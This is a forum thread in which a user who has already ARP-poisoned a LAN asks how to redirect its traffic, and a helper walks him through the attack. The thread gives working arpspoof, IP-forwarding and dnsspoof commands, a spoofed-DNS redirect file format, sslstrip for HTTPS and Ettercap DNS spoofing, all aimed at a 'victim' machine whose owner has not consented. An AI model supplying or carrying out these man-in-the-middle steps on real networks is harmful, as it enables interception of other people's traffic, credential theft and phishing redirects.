Forum Thread: IPtables

IPtables

Hello people. I would like to ask, how can I redirect all traffic going on network to another webserver, for example, local Apache server. I did ARP Cache Poisoning, all traffic on network seems to be going through me, but I need to redirect it somewhere else.

Thanks!

36 Responses

Are you basically executing an arpspoof-like attack?

TRT

Yes (arpspoof -t <target IP> <Gateway>) and in another terminal (arpspoof -t <gateway> <target IP>)

What do you mean by "I need to redirect it somewhere else"? Are you looking to setup a phishing attack? Or you just want to sniff traffic with tools like tcpdump and Wireshark?

Be specific about what you want to do, and this requires a reply with more than one line of explanation. It is really hard to help you otherwise.

TRT

Yes, I know, sorry. No, it won't be for phishing. Does it matter where it will be redirected? I can say it will be redirected to another website IP.

For that you could use dnsspoof (or something alike). But first you will need to create a file that will specify the redirections, kind of like the /etc/hosts file. Let's go through the steps:

> touch redirect
> nano redirect

Now insert a website that you want to be redirected, followed by a tab, followed by the IP address of where you want to redirect the victim.

For example, let's say I wanted to redirect the victim to WHT every time they try to access Adobe's website. I would insert the line:

adobe.com****8.26.65.101
(Four stars indicate a tab, I just can't write tabs in the comments here.)

If you want to add more entries, do so on a new line for each entry. You can also specify subdomains, all subdomains with a * (wildcard), and just IP to IP redirects. Basically the format is:

<source><tab_key><destination>

Moving on, save the file by pressing Ctrl+x then y and finally Enter. Now to get the process going, type:
> dnsspoof -i <interface> -f <file>
In our example case, the file was called redirect and let's pretend the interface is wlan0:
> dnsspoof -i wlan0 -f redirect

That's pretty much it really. To see if it actually worked, use tcpdump and check if the traffic was redirected to the websites you specified in the redirect file.

TRT

Dnsspoof showed error. I will quote that error in a few minutes here.

Udp dst port 53 and not source <target server IP>

Drop a few screenshots (if you can) of the entire process.
(PS: use the in-built gallery feature so as not to clutter the comments)

TRT

I am on phone and my browser is formatting this website incorrectly. When pushing picture button, I can only see field for URL to take image from and I cannot see upload option...

Hold on a sec, this isn't an error. Is this what you are seeing?
dnsspoof: listening on __ [udp dst port 53 and not src __ ]

Have you tested the victim's side? It should work just fine. I'm highly positive you haven't tried to verify everything from the victim's machine.

TRT

Yes, that's it. Surprisingly, I did. I tried visiting website I want to redirect and it did not work. My hosts file is hosts without any extension and it look like this :

www.facebook.com <four spaces> destination IP

The 'error' to which you referred is not an error at all, in fact. Also, I can now tell you exactly why it failed. Facebook automatically creates an https link, even if you specify http in your browser. To support https you will need to use sslstrip (or sslstrip+ apparently).

How about you try to use the line from the above directions:
adobe.com****8.26.65.101
(Again, four stars for a tab.)

Then enter adobe.com (without 'www') from the victim's side and see if that redirects to this domain's beautiful front page.

TRT

The problem is I tried non-SSL websites in hosts file too, and it did the same.

If you are still on about the [udp dst port 53...] message you are seeing, then I don't know how to reiterate to you that it is not, in fact, an error. It is a message that is always shown by dnsspoof and in all of the test that I have conducted it has never indicated any sign of failure.

As for not being able to redirect, I don't know your exact issue. I have noticed, in the past, some people entering "www." before the domain name in the redirect file, and then when carrying out the actual test from the victim machine they forget to use it.

Not all websites have www as their main subdomain, and many do not redirect users who enter www to the front page. Therefore, if you want to cover all cases for a certain domain, you should add 2 entries:

adobe.com****8.26.65.101
*.adobe.com****8.26.65.101

This will ensure that whenever Adobe's domain is used, any and all subdomains, including the primary one, will redirect to WHT.

Carry out a few more trials, look over everything I've told you, make sure your adapter is not is monitor mode, reboot and start over. Then inform me of any accomplishments, if existent.

TRT

Can you give me your mail or Facebook or anything? I can send it there.

Have you already echo 1 > /proc/sys/net/ipv4/ip_forward ?

TRT, no accomplishment..
It's not working, I followed every your step :

  1. echo 1 > /proc/sys/net/ipv4/ipforward
  2. arpspoof -t <target local IP> <gateway>
  3. arpspoof -t <gateway> <target local IP>
  4. dnsspoof -f hosts

//Hosts file looks like this :
adobe.com TAB <destination website IP>
.adobe.com TAB <destination website IP>
It won't probably show that star before adobe.com because it will bold this text.

  1. At the target browser adobe.com and it will show home page of Adobe

Alright, I might have figured out the issue, but I'm not entirely sure. Try changing the redirect file's contents to this:

adobe.com**A**8.26.65.101
*.adobe.com**A**8.26.65.101
(Two stars means 2 spaces, rather than a tab.)

Let me know if this works for you.

TRT

Not working, it did the same. Loaded their home page. For example, SSLstrip is working great, along with URLsnarf and things like that. So ARPspoof is configured correctly.

I will look into this when I get to the lab. This hasn't failed me, so I am curious to find out what I've missed out when explaining it to you.

TRT

TRT ... SUCCESS

Using ETTERCAP, I've redirected microsoft.com to my local IP. There are some problems, but I will try to fix them. Two more questions to get this done:

  1. Can I redirect ALL traffic on LAN to another IP ?
  2. What we can do about with DNSspoof program? I mean when I don't want to use Ettercap... because that one is not working.

hosts:
www.microsoft.com A 192.168.100.10
microsoft.com A 192.168.100.10

  1. Yes, you can setup an Apache proxy which will redirect traffic to a specific destination.
  2. I will look into dns spoof when I find the opportunity, but right now just stick to Ettercap if it's working. I have a tutorial on it, in case you don't already know, so that might serve you some help.

By the way, screenshot those Ettercap errors and drop them down below. Let's get them out of the way and concentrate on the bigger picture, which involves getting your DNS intermediary to redirect traffic successfully using dns spoof.

TRT

OK. Yes, Ettercap is working now. I am going to make those screenshots now.
Thanks a lot.

I fixed those errors so we can now concentrate on DNSspoof. I tried using Ettercap etter.dns file for DNSspoof (dnsspoof -f etter.dns) and it didn't work. Same output than before: udp dst port 53...

Yes, I figured it wouldn't work, just wanted to make sure that was the case. Just use a file without an extension, with the entries I originally told you about, as the redirect file:

> touch redirect
> nano redirect
adobe.com****8.26.65.101
*.adobe.com****8.26.65.101
> arpspoof -i <interface> -t <target> <gateway>
> arpspoof -i <interface> -t <gateway> <target>
> dnsspoof -i <interface> -f redirect
dnsspoof: listening on <interface> [udp dst port 53 and not src _ ]

(Victim)
*visits adobe.com*

(Back to Attacker)
victim_IP.xxxx > gateway_IP.53: xxxx+ A? adobe.com

(Victim)
*presented with WHT's front page*
*looks confused*

And, for the millionth time, "udp dst port 53..." is not an error message. It is simply a declaration that port 53 (domain) will be used and that it was successful in its implementation (and so on).

TRT

Can I create that file using another editor (graphical) ?

You can use any editor you like. I just find nano very quick and easy. You can even just do:
> nano redirect
*type your entries*
Ctrl+O then Enter then Ctrl+X and you're over with this step.

Use whatever you feel comfortable with. Just know that getting accustomed to CLI interfaces will gradually make you more comfortable when in their presence.

TRT

It's not working, it's not redirecting...

Nope, not working....

Are you running anything in a Virtual Machine? Have you properly performed the ARP poisoning step? Is the victim actually on your network? Type ping -t 5 <target_IP> then ping -t 5 <gateway_IP> and reply back with a Pastebin link to both outputs. None of this makes any sense to me, as I have tested this numerous times.

TRT

Sorry, but do you think I am retarded that I can't follow exact steps? Of course I did, and IT IS on my LAN. I can't do this using Pastebin. Both of them are responding with 64 bytes of data. And no, I am running Kali in my notebook and not in VM.

Wait a second ...
ETTERCAP

I've modified ettercap's DNS Spoof file and I used their example for microsoft website. Ettercap output was something like spoofed microsoft.com to <IP Address>.

I am trying to change that website and IP to test it out if it's really working. In that file, it is www.microsoft.com A <IP>.

Do you think I am going to assist you if you continue to be so agitated? I am giving you answers based on the information available to me. Unless you are meticulous I will have to carry on hypothesising, and we both know that hasn't solved anything yet.

TRT

Ok, let it be. I will use Ettercap instead...

Simtoon101;

If you are not grateful for all the help that TRT offered you, you don't deserve his help.

Share Your Thoughts

  • Hot
  • Active